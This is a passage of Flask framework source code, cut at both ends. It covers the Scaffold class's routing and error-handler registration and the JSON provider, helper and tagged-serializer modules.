bound=t.Callable[..., t.Any]) T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any]) T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_context_processor = t.TypeVar( "T_template_context_processor", bound=ft.TemplateContextProcessorCallable ) T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) T_url_value_preprocessor = t.TypeVar( "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable ) T_route = t.TypeVar("T_route", bound=ft.RouteCallable) def setupmethod(f: F) -> F: f_name = f.__name__ def wrapper_func(self: Scaffold, *args: t.Any, **kwargs: t.Any) -> t.Any: self._check_setup_finished(f_name) return f(self, *args, **kwargs) return t.cast(F, update_wrapper(wrapper_func, f)) class Scaffold: """Common behavior shared between :class:`~flask.Flask` and :class:`~flask.blueprints.Blueprint`. :param import_name: The import name of the module where this object is defined. Usually :attr:`__name__` should be used. :param static_folder: Path to a folder of static files to serve. If this is set, a static route will be added. :param static_url_path: URL prefix for the static route. :param template_folder: Path to a folder containing template files. for rendering. If this is set, a Jinja loader will be added. :param root_path: The path that static, template, and resource files are relative to. Typically not set, it is discovered based on the ``import_name``. .. versionadded:: 2.0 """ cli: Group name: str _static_folder: str | None = None _static_url_path: str | None = None def __init__( self, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, root_path: str | None = None, ): #: The name of the package or module that this object belongs #: to. Do not change this once it is set by the constructor. self.import_name = import_name self.static_folder = static_folder # type: ignore self.static_url_path = static_url_path #: The path to the templates folder, relative to #: :attr:`root_path`, to add to the template loader. ``None`` if #: templates should not be added. self.template_folder = template_folder if root_path is None: root_path = get_root_path(self.import_name) #: Absolute path to the package on the filesystem. Used to look #: up resources contained in the package. self.root_path = root_path #: A dictionary mapping endpoint names to view functions. #: #: To register a view function, use the :meth:`route` decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.view_functions: dict[str, ft.RouteCallable] = {} #: A data structure of registered error handlers, in the format #: ``{scope: {code: {class: handler}}}``. The ``scope`` key is #: the name of a blueprint the handlers are active for, or #: ``None`` for all requests. The ``code`` key is the HTTP #: status code for ``HTTPException``, or ``None`` for #: other exceptions. The innermost dictionary maps exception #: classes to handler functions. #: #: To register an error handler, use the :meth:`errorhandler` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.error_handler_spec: dict[ ft.AppOrBlueprintKey, dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]], ] = defaultdict(lambda: defaultdict(dict)) #: A data structure of functions to call at the beginning of #: each request, in the format ``{scope: [functions]}``. The #: ``scope`` key is the name of a blueprint the functions are #: active for, or ``None`` for all requests. #: #: To register a function, use the :meth:`before_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.before_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable] ] = defaultdict(list) #: A data structure of functions to call at the end of each #: request, in the format ``{scope: [functions]}``. The #: ``scope`` key is the name of a blueprint the functions are #: active for, or ``None`` for all requests. #: #: To register a function, use the :meth:`after_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.after_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.AfterRequestCallable[t.Any]] ] = defaultdict(list) #: A data structure of functions to call at the end of each #: request even if an exception is raised, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`teardown_request` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.teardown_request_funcs: dict[ ft.AppOrBlueprintKey, list[ft.TeardownCallable] ] = defaultdict(list) #: A data structure of functions to call to pass extra context #: values when rendering templates, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`context_processor` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.template_context_processors: dict[ ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable] ] = defaultdict(list, {None: [_default_template_ctx_processor]}) #: A data structure of functions to call to modify the keyword #: arguments passed to the view function, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the #: :meth:`url_value_preprocessor` decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.url_value_preprocessors: dict[ ft.AppOrBlueprintKey, list[ft.URLValuePreprocessorCallable], ] = defaultdict(list) #: A data structure of functions to call to modify the keyword #: arguments when generating URLs, in the format #: ``{scope: [functions]}``. The ``scope`` key is the name of a #: blueprint the functions are active for, or ``None`` for all #: requests. #: #: To register a function, use the :meth:`url_defaults` #: decorator. #: #: This data structure is internal. It should not be modified #: directly and its format may change at any time. self.url_default_functions: dict[ ft.AppOrBlueprintKey, list[ft.URLDefaultCallable] ] = defaultdict(list) def __repr__(self) -> str: return f"<{type(self).__name__} {self.name!r}>" def _check_setup_finished(self, f_name: str) -> None: raise NotImplementedError @property def static_folder(self) -> str | None: """The absolute path to the configured static folder. ``None`` if no static folder is set. """ if self._static_folder is not None: return os.path.join(self.root_path, self._static_folder) else: return None @static_folder.setter def static_folder(self, value: str | os.PathLike[str] | None) -> None: if value is not None: value = os.fspath(value).rstrip(r"\/") self._static_folder = value @property def has_static_folder(self) -> bool: """``True`` if :attr:`static_folder` is set. .. versionadded:: 0.5 """ return self.static_folder is not None @property def static_url_path(self) -> str | None: """The URL prefix that the static route will be accessible from. If it was not configured during init, it is derived from :attr:`static_folder`. """ if self._static_url_path is not None: return self._static_url_path if self.static_folder is not None: basename = os.path.basename(self.static_folder) return f"/{basename}".rstrip("/") return None @static_url_path.setter def static_url_path(self, value: str | None) -> None: if value is not None: value = value.rstrip("/") self._static_url_path = value @cached_property def jinja_loader(self) -> BaseLoader | None: """The Jinja loader for this object's templates. By default this is a class :class:`jinja2.loaders.FileSystemLoader` to :attr:`template_folder` if it is set. .. versionadded:: 0.5 """ if self.template_folder is not None: return FileSystemLoader(os.path.join(self.root_path, self.template_folder)) else: return None def _method_route( self, method: str, rule: str, options: dict[str, t.Any], ) -> t.Callable[[T_route], T_route]: if "methods" in options: raise TypeError("Use the 'route' decorator to use the 'methods' argument.") return self.route(rule, methods=[method], **options) @setupmethod def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["GET"]``. .. versionadded:: 2.0 """ return self._method_route("GET", rule, options) @setupmethod def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["POST"]``. .. versionadded:: 2.0 """ return self._method_route("POST", rule, options) @setupmethod def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["PUT"]``. .. versionadded:: 2.0 """ return self._method_route("PUT", rule, options) @setupmethod def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["DELETE"]``. .. versionadded:: 2.0 """ return self._method_route("DELETE", rule, options) @setupmethod def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Shortcut for :meth:`route` with ``methods=["PATCH"]``. .. versionadded:: 2.0 """ return self._method_route("PATCH", rule, options) @setupmethod def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: """Decorate a view function to register it with the given URL rule and options. Calls :meth:`add_url_rule`, which has more details about the implementation. .. code-block:: python @app.route("/") def index(): return "Hello, World!" See :ref:`url-route-registrations`. The endpoint name for the route defaults to the name of the view function if the ``endpoint`` parameter isn't passed. The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and ``OPTIONS`` are added automatically. :param rule: The URL rule string. :param options: Extra options passed to the :class:`~werkzeug.routing.Rule` object. """ def decorator(f: T_route) -> T_route: endpoint = options.pop("endpoint", None) self.add_url_rule(rule, endpoint, f, **options) return f return decorator @setupmethod def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, provide_automatic_options: bool | None = None, **options: t.Any, ) -> None: """Register a rule for routing incoming requests and building URLs. The :meth:`route` decorator is a shortcut to call this with the ``view_func`` argument. These are equivalent: .. code-block:: python @app.route("/") def index(): ... .. code-block:: python def index(): ... app.add_url_rule("/", view_func=index) See :ref:`url-route-registrations`. The endpoint name for the route defaults to the name of the view function if the ``endpoint`` parameter isn't passed. An error will be raised if a function has already been registered for the endpoint. The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is always added automatically, and ``OPTIONS`` is added automatically by default. ``view_func`` does not necessarily need to be passed, but if the rule should participate in routing an endpoint name must be associated with a view function at some point with the :meth:`endpoint` decorator. .. code-block:: python app.add_url_rule("/", endpoint="index") @app.endpoint("index") def index(): ... If ``view_func`` has a ``required_methods`` attribute, those methods are added to the passed and automatic methods. If it has a ``provide_automatic_methods`` attribute, it is used as the default if the parameter is not passed. :param rule: The URL rule string. :param endpoint: The endpoint name to associate with the rule and view function. Used when routing and building URLs. Defaults to ``view_func.__name__``. :param view_func: The view function to associate with the endpoint name. :param provide_automatic_options: Add the ``OPTIONS`` method and respond to ``OPTIONS`` requests automatically. :param options: Extra options passed to the :class:`~werkzeug.routing.Rule` object. """ raise NotImplementedError @setupmethod def endpoint(self, endpoint: str) -> t.Callable[[F], F]: """Decorate a view function to register it for the given endpoint. Used if a rule is added without a ``view_func`` with :meth:`add_url_rule`. .. code-block:: python app.add_url_rule("/ex", endpoint="example") @app.endpoint("example") def example(): ... :param endpoint: The endpoint name to associate with the view function. """ def decorator(f: F) -> F: self.view_functions[endpoint] = f return f return decorator @setupmethod def before_request(self, f: T_before_request) -> T_before_request: """Register a function to run before each request. For example, this can be used to open a database connection, or to load the logged in user from the session. .. code-block:: python @app.before_request def load_user(): if "user_id" in session: g.user = db.session.get(session["user_id"]) The function will be called without any arguments. If it returns a non-``None`` value, the value is handled as if it was the return value from the view, and further request handling is stopped. This is available on both app and blueprint objects. When used on an app, this executes before every request. When used on a blueprint, this executes before every request that the blueprint handles. To register with a blueprint and execute before every request, use :meth:`.Blueprint.before_app_request`. """ self.before_request_funcs.setdefault(None, []).append(f) return f @setupmethod def after_request(self, f: T_after_request) -> T_after_request: """Register a function to run after each request to this object. The function is called with the response object, and must return a response object. This allows the functions to modify or replace the response before it is sent. If a function raises an exception, any remaining ``after_request`` functions will not be called. Therefore, this should not be used for actions that must execute, such as to close resources. Use :meth:`teardown_request` for that. This is available on both app and blueprint objects. When used on an app, this executes after every request. When used on a blueprint, this executes after every request that the blueprint handles. To register with a blueprint and execute after every request, use :meth:`.Blueprint.after_app_request`. """ self.after_request_funcs.setdefault(None, []).append(f) return f @setupmethod def teardown_request(self, f: T_teardown) -> T_teardown: """Register a function to be called when the request context is popped. Typically this happens at the end of each request, but contexts may be pushed manually as well during testing. .. code-block:: python with app.test_request_context(): ... When the ``with`` block exits (or ``ctx.pop()`` is called), the teardown functions are called just before the request context is made inactive. When a teardown function was called because of an unhandled exception it will be passed an error object. If an :meth:`errorhandler` is registered, it will handle the exception and the teardown will not receive it. Teardown functions must avoid raising exceptions. If they execute code that might fail they must surround that code with a ``try``/``except`` block and log any errors. The return values of teardown functions are ignored. This is available on both app and blueprint objects. When used on an app, this executes after every request. When used on a blueprint, this executes after every request that the blueprint handles. To register with a blueprint and execute after every request, use :meth:`.Blueprint.teardown_app_request`. """ self.teardown_request_funcs.setdefault(None, []).append(f) return f @setupmethod def context_processor( self, f: T_template_context_processor, ) -> T_template_context_processor: """Registers a template context processor function. These functions run before rendering a template. The keys of the returned dict are added as variables available in the template. This is available on both app and blueprint objects. When used on an app, this is called for every rendered template. When used on a blueprint, this is called for templates rendered from the blueprint's views. To register with a blueprint and affect every template, use :meth:`.Blueprint.app_context_processor`. """ self.template_context_processors[None].append(f) return f @setupmethod def url_value_preprocessor( self, f: T_url_value_preprocessor, ) -> T_url_value_preprocessor: """Register a URL value preprocessor function for all view functions in the application. These functions will be called before the :meth:`before_request` functions. The function can modify the values captured from the matched url before they are passed to the view. For example, this can be used to pop a common language code value and place it in ``g`` rather than pass it to every view. The function is passed the endpoint name and values dict. The return value is ignored. This is available on both app and blueprint objects. When used on an app, this is called for every request. When used on a blueprint, this is called for requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_url_value_preprocessor`. """ self.url_value_preprocessors[None].append(f) return f @setupmethod def url_defaults(self, f: T_url_defaults) -> T_url_defaults: """Callback function for URL defaults for all view functions of the application. It's called with the endpoint and values and should update the values passed in place. This is available on both app and blueprint objects. When used on an app, this is called for every request. When used on a blueprint, this is called for requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_url_defaults`. """ self.url_default_functions[None].append(f) return f @setupmethod def errorhandler( self, code_or_exception: type[Exception] | int ) -> t.Callable[[T_error_handler], T_error_handler]: """Register a function to handle errors by code or exception class. A decorator that is used to register a function given an error code. Example:: @app.errorhandler(404) def page_not_found(error): return 'This page does not exist', 404 You can also register handlers for arbitrary exceptions:: @app.errorhandler(DatabaseError) def special_exception_handler(error): return 'Database connection failed', 500 This is available on both app and blueprint objects. When used on an app, this can handle errors from every request. When used on a blueprint, this can handle errors from requests that the blueprint handles. To register with a blueprint and affect every request, use :meth:`.Blueprint.app_errorhandler`. .. versionadded:: 0.7 Use :meth:`register_error_handler` instead of modifying :attr:`error_handler_spec` directly, for application wide error handlers. .. versionadded:: 0.7 One can now additionally also register custom exception types that do not necessarily have to be a subclass of the :class:`~werkzeug.exceptions.HTTPException` class. :param code_or_exception: the code as integer for the handler, or an arbitrary exception """ def decorator(f: T_error_handler) -> T_error_handler: self.register_error_handler(code_or_exception, f) return f return decorator @setupmethod def register_error_handler( self, code_or_exception: type[Exception] | int, f: ft.ErrorHandlerCallable, ) -> None: """Alternative error attach function to the :meth:`errorhandler` decorator that is more straightforward to use for non decorator usage. .. versionadded:: 0.7 """ exc_class, code = self._get_exc_class_and_code(code_or_exception) self.error_handler_spec[None][code][exc_class] = f @staticmethod def _get_exc_class_and_code( exc_class_or_code: type[Exception] | int, ) -> tuple[type[Exception], int | None]: """Get the exception class being handled. For HTTP status codes or ``HTTPException`` subclasses, return both the exception and status code. :param exc_class_or_code: Any exception class, or an HTTP status code as an integer. """ exc_class: type[Exception] if isinstance(exc_class_or_code, int): try: exc_class = default_exceptions[exc_class_or_code] except KeyError: raise ValueError( f"'{exc_class_or_code}' is not a recognized HTTP" " error code. Use a subclass of HTTPException with" " that code instead." ) from None else: exc_class = exc_class_or_code if isinstance(exc_class, Exception): raise TypeError( f"{exc_class!r} is an instance, not a class. Handlers" " can only be registered for Exception classes or HTTP" " error codes." ) if not issubclass(exc_class, Exception): raise ValueError( f"'{exc_class.__name__}' is not a subclass of Exception." " Handlers can only be registered for Exception classes" " or HTTP error codes." ) if issubclass(exc_class, HTTPException): return exc_class, exc_class.code else: return exc_class, None def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str: """Internal helper that returns the default endpoint for a given function. This always is the function name. """ assert view_func is not None, "expected view func if endpoint is not provided." return view_func.__name__ def _path_is_relative_to(path: pathlib.PurePath, base: str) -> bool: # Path.is_relative_to doesn't exist until Python 3.9 try: path.relative_to(base) return True except ValueError: return False def _find_package_path(import_name: str) -> str: """Find the path that contains the package or module.""" root_mod_name, _, _ = import_name.partition(".") try: root_spec = importlib.util.find_spec(root_mod_name) if root_spec is None: raise ValueError("not found") except (ImportError, ValueError): # ImportError: the machinery told us it does not exist # ValueError: # - the module name was invalid # - the module name is __main__ # - we raised `ValueError` due to `root_spec` being `None` return os.getcwd() if root_spec.submodule_search_locations: if root_spec.origin is None or root_spec.origin == "namespace": # namespace package package_spec = importlib.util.find_spec(import_name) if package_spec is not None and package_spec.submodule_search_locations: # Pick the path in the namespace that contains the submodule. package_path = pathlib.Path( os.path.commonpath(package_spec.submodule_search_locations) ) search_location = next( location for location in root_spec.submodule_search_locations if _path_is_relative_to(package_path, location) ) else: # Pick the first path. search_location = root_spec.submodule_search_locations[0] return os.path.dirname(search_location) else: # package with __init__.py return os.path.dirname(os.path.dirname(root_spec.origin)) else: # module return os.path.dirname(root_spec.origin) # type: ignore[type-var, return-value] def find_package(import_name: str) -> tuple[str | None, str]: """Find the prefix that a package is installed under, and the path that it would be imported from. The prefix is the directory containing the standard directory hierarchy (lib, bin, etc.). If the package is not installed to the system (:attr:`sys.prefix`) or a virtualenv (``site-packages``), ``None`` is returned. The path is the entry in :attr:`sys.path` that contains the package for import. If the package is not installed, it's assumed that the package was imported from the current working directory. """ package_path = _find_package_path(import_name) py_prefix = os.path.abspath(sys.prefix) # installed to the system if _path_is_relative_to(pathlib.PurePath(package_path), py_prefix): return py_prefix, package_path site_parent, site_folder = os.path.split(package_path) # installed to a virtualenv if site_folder.lower() == "site-packages": parent, folder = os.path.split(site_parent) # Windows (prefix/lib/site-packages) if folder.lower() == "lib": return parent, package_path # Unix (prefix/lib/pythonX.Y/site-packages) if os.path.basename(parent).lower() == "lib": return os.path.dirname(parent), package_path # something else (prefix/site-packages) return site_parent, package_path # not installed return None, package_path File: src/flask/json/provider.py from __future__ import annotations import dataclasses import decimal import json import typing as t import uuid import weakref from datetime import date from werkzeug.http import http_date if t.TYPE_CHECKING: # pragma: no cover from werkzeug.sansio.response import Response from ..sansio.app import App class JSONProvider: """A standard set of JSON operations for an application. Subclasses of this can be used to customize JSON behavior or use different JSON libraries. To implement a provider for a specific library, subclass this base class and implement at least :meth:`dumps` and :meth:`loads`. All other methods have default implementations. To use a different provider, either subclass ``Flask`` and set :attr:`~flask.Flask.json_provider_class` to a provider class, or set :attr:`app.json <flask.Flask.json>` to an instance of the class. :param app: An application instance. This will be stored as a :class:`weakref.proxy` on the :attr:`_app` attribute. .. versionadded:: 2.2 """ def __init__(self, app: App) -> None: self._app: App = weakref.proxy(app) def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON. :param obj: The data to serialize. :param kwargs: May be passed to the underlying JSON library. """ raise NotImplementedError def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: """Serialize data as JSON and write to a file. :param obj: The data to serialize. :param fp: A file opened for writing text. Should use the UTF-8 encoding to be valid JSON. :param kwargs: May be passed to the underlying JSON library. """ fp.write(self.dumps(obj, **kwargs)) def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON. :param s: Text or UTF-8 bytes. :param kwargs: May be passed to the underlying JSON library. """ raise NotImplementedError def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: """Deserialize data as JSON read from a file. :param fp: A file opened for reading text or UTF-8 bytes. :param kwargs: May be passed to the underlying JSON library. """ return self.loads(fp.read(), **kwargs) def _prepare_response_obj( self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] ) -> t.Any: if args and kwargs: raise TypeError("app.json.response() takes either args or kwargs, not both") if not args and not kwargs: return None if len(args) == 1: return args[0] return args or kwargs def response(self, *args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with the ``application/json`` mimetype. The :func:`~flask.json.jsonify` function calls this method for the current application. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. """ obj = self._prepare_response_obj(args, kwargs) return self._app.response_class(self.dumps(obj), mimetype="application/json") def _default(o: t.Any) -> t.Any: if isinstance(o, date): return http_date(o) if isinstance(o, (decimal.Decimal, uuid.UUID)): return str(o) if dataclasses and dataclasses.is_dataclass(o): return dataclasses.asdict(o) # type: ignore[call-overload] if hasattr(o, "__html__"): return str(o.__html__()) raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable") class DefaultJSONProvider(JSONProvider): """Provide JSON operations using Python's built-in :mod:`json` library. Serializes the following additional data types: - :class:`datetime.datetime` and :class:`datetime.date` are serialized to :rfc:`822` strings. This is the same as the HTTP date format. - :class:`uuid.UUID` is serialized to a string. - :class:`dataclasses.dataclass` is passed to :func:`dataclasses.asdict`. - :class:`~markupsafe.Markup` (or any object with a ``__html__`` method) will call the ``__html__`` method to get a string. """ default: t.Callable[[t.Any], t.Any] = staticmethod(_default) # type: ignore[assignment] """Apply this function to any object that :meth:`json.dumps` does not know how to serialize. It should return a valid JSON type or raise a ``TypeError``. """ ensure_ascii = True """Replace non-ASCII characters with escape sequences. This may be more compatible with some clients, but can be disabled for better performance and size. """ sort_keys = True """Sort the keys in any serialized dicts. This may be useful for some caching situations, but can be disabled for better performance. When enabled, keys must all be strings, they are not converted before sorting. """ compact: bool | None = None """If ``True``, or ``None`` out of debug mode, the :meth:`response` output will not add indentation, newlines, or spaces. If ``False``, or ``None`` in debug mode, it will use a non-compact representation. """ mimetype = "application/json" """The mimetype set in :meth:`response`.""" def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON to a string. Keyword arguments are passed to :func:`json.dumps`. Sets some parameter defaults from the :attr:`default`, :attr:`ensure_ascii`, and :attr:`sort_keys` attributes. :param obj: The data to serialize. :param kwargs: Passed to :func:`json.dumps`. """ kwargs.setdefault("default", self.default) kwargs.setdefault("ensure_ascii", self.ensure_ascii) kwargs.setdefault("sort_keys", self.sort_keys) return json.dumps(obj, **kwargs) def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON from a string or bytes. :param s: Text or UTF-8 bytes. :param kwargs: Passed to :func:`json.loads`. """ return json.loads(s, **kwargs) def response(self, *args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with it. The response mimetype will be "application/json" and can be changed with :attr:`mimetype`. If :attr:`compact` is ``False`` or debug mode is enabled, the output will be formatted to be easier to read. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. """ obj = self._prepare_response_obj(args, kwargs) dump_args: dict[str, t.Any] = {} if (self.compact is None and self._app.debug) or self.compact is False: dump_args.setdefault("indent", 2) else: dump_args.setdefault("separators", (",", ":")) return self._app.response_class( f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype ) File: src/flask/json/__init__.py from __future__ import annotations import json as _json import typing as t from ..globals import current_app from .provider import _default if t.TYPE_CHECKING: # pragma: no cover from ..wrappers import Response def dumps(obj: t.Any, **kwargs: t.Any) -> str: """Serialize data as JSON. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.dumps() <flask.json.provider.JSONProvider.dumps>` method, otherwise it will use :func:`json.dumps`. :param obj: The data to serialize. :param kwargs: Arguments passed to the ``dumps`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.dumps``, allowing an app to override the behavior. .. versionchanged:: 2.0.2 :class:`decimal.Decimal` is supported by converting to a string. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. .. versionchanged:: 1.0.3 ``app`` can be passed directly, rather than requiring an app context for configuration. """ if current_app: return current_app.json.dumps(obj, **kwargs) kwargs.setdefault("default", _default) return _json.dumps(obj, **kwargs) def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: """Serialize data as JSON and write to a file. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.dump() <flask.json.provider.JSONProvider.dump>` method, otherwise it will use :func:`json.dump`. :param obj: The data to serialize. :param fp: A file opened for writing text. Should use the UTF-8 encoding to be valid JSON. :param kwargs: Arguments passed to the ``dump`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.dump``, allowing an app to override the behavior. .. versionchanged:: 2.0 Writing to a binary file, and the ``encoding`` argument, will be removed in Flask 2.1. """ if current_app: current_app.json.dump(obj, fp, **kwargs) else: kwargs.setdefault("default", _default) _json.dump(obj, fp, **kwargs) def loads(s: str | bytes, **kwargs: t.Any) -> t.Any: """Deserialize data as JSON. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.loads() <flask.json.provider.JSONProvider.loads>` method, otherwise it will use :func:`json.loads`. :param s: Text or UTF-8 bytes. :param kwargs: Arguments passed to the ``loads`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.loads``, allowing an app to override the behavior. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. The data must be a string or UTF-8 bytes. .. versionchanged:: 1.0.3 ``app`` can be passed directly, rather than requiring an app context for configuration. """ if current_app: return current_app.json.loads(s, **kwargs) return _json.loads(s, **kwargs) def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: """Deserialize data as JSON read from a file. If :data:`~flask.current_app` is available, it will use its :meth:`app.json.load() <flask.json.provider.JSONProvider.load>` method, otherwise it will use :func:`json.load`. :param fp: A file opened for reading text or UTF-8 bytes. :param kwargs: Arguments passed to the ``load`` implementation. .. versionchanged:: 2.3 The ``app`` parameter was removed. .. versionchanged:: 2.2 Calls ``current_app.json.load``, allowing an app to override the behavior. .. versionchanged:: 2.2 The ``app`` parameter will be removed in Flask 2.3. .. versionchanged:: 2.0 ``encoding`` will be removed in Flask 2.1. The file must be text mode, or binary mode with UTF-8 bytes. """ if current_app: return current_app.json.load(fp, **kwargs) return _json.load(fp, **kwargs) def jsonify(*args: t.Any, **kwargs: t.Any) -> Response: """Serialize the given arguments as JSON, and return a :class:`~flask.Response` object with the ``application/json`` mimetype. A dict or list returned from a view will be converted to a JSON response automatically without needing to call this. This requires an active request or application context, and calls :meth:`app.json.response() <flask.json.provider.JSONProvider.response>`. In debug mode, the output is formatted with indentation to make it easier to read. This may also be controlled by the provider. Either positional or keyword arguments can be given, not both. If no arguments are given, ``None`` is serialized. :param args: A single value to serialize, or multiple values to treat as a list to serialize. :param kwargs: Treat as a dict to serialize. .. versionchanged:: 2.2 Calls ``current_app.json.response``, allowing an app to override the behavior. .. versionchanged:: 2.0.2 :class:`decimal.Decimal` is supported by converting to a string. .. versionchanged:: 0.11 Added support for serializing top-level arrays. This was a security risk in ancient browsers. See :ref:`security-json`. .. versionadded:: 0.2 """ return current_app.json.response(*args, **kwargs) # type: ignore[return-value] File: src/flask/json/tag.py """ Tagged JSON ~~~~~~~~~~~ A compact representation for lossless serialization of non-standard JSON types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this to serialize the session data, but it may be useful in other places. It can be extended to support other types. .. autoclass:: TaggedJSONSerializer :members: .. autoclass:: JSONTag :members: Let's see an example that adds support for :class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so to handle this we will dump the items as a list of ``[key, value]`` pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to identify the type. The session serializer processes dicts first, so insert the new tag at the front of the order since ``OrderedDict`` must be processed before ``dict``. .. code-block:: python from flask.json.tag import JSONTag class TagOrderedDict(JSONTag): __slots__ = ('serializer',) key = ' od' def check(self, value): return isinstance(value, OrderedDict) def to_json(self, value): return [[k, self.serializer.tag(v)] for k, v in iteritems(value)] def to_python(self, value): return OrderedDict(value) app.session_interface.serializer.register(TagOrderedDict, index=0) """ from __future__ import annotations import typing as t from base64 import b64decode from base64 import b64encode from datetime import datetime from uuid import UUID from markupsafe import Markup from werkzeug.http import http_date from werkzeug.http import parse_date from ..json import dumps from ..json import loads class JSONTag: """Base class for defining type tags for :class:`TaggedJSONSerializer`.""" __slots__ = ("serializer",) #: The tag to mark the serialized object with. If empty, this tag is #: only used as an intermediate step during tagging. key: str = "" def __init__(self, serializer: TaggedJSONSerializer) -> None: """Create a tagger for the given serializer.""" self.serializer = serializer def check(self, value: t.Any) -> bool: """Check if the given value should be tagged by this tag.""" raise NotImplementedError def to_json(self, value: t.Any) -> t.Any: """Convert the Python object to an object that is a valid JSON type. The tag will be added later.""" raise NotImplementedError def to_python(self, value: t.Any) -> t.Any: """Convert the JSON representation back to the correct type. The tag will already be removed.""" raise NotImplementedError def tag(self, value: t.Any) -> dict[str, t.Any]: """Convert the value to a valid JSON type and add the tag structure around it.""" return {self.key: self.to_json(value)} class TagDict(JSONTag): """Tag for 1-item dicts whose only key matches a registered tag. Internally, the dict key is suffixed with `__`, and the suffix is removed when deserializing. """ __slots__ = () key = " di" def check(self, value: t.Any) -> bool: return ( isinstance(value, dict) and len(value) == 1 and next(iter(value)) in self.serializer.tags ) def to_json(self, value: t.Any) -> t.Any: key = next(iter(value)) return {f"{key}__": self.serializer.tag(value[key])} def to_python(self, value: t.Any) -> t.Any: key = next(iter(value)) return {key[:-2]: value[key]} class PassDict(JSONTag): __slots__ = () def check(self, value: t.Any) -> bool: return isinstance(value, dict) def to_json(self, value: t.Any) -> t.Any: # JSON objects may only have string keys, so don't bother tagging the # key here. return {k: self.serializer.tag(v) for k, v in value.items()} tag = to_json class TagTuple(JSONTag): __slots__ = () key = " t" def check(self, value: t.Any) -> bool: return isinstance(value, tuple) def to_json(self, value: t.Any) -> t.Any: return [self.serializer.tag(item) for item in value] def to_python(self, value: t.Any) -> t.Any: return tuple(value) class PassList(JSONTag): __slots__ = () def check(self, value: t.Any) -> bool: return isinstance(value, list) def to_json(self, value: t.Any) -> t.Any: return [self.serializer.tag(item) for item in value] tag = to_json class TagBytes(JSONTag): __slots__ = () key = " b" def check(self, value: t.Any) -> bool: return isinstance(value, bytes) def to_json(self, value: t.Any) -> t.Any: return b64encode(value).decode("ascii") def to_python(self, value: t.Any) -> 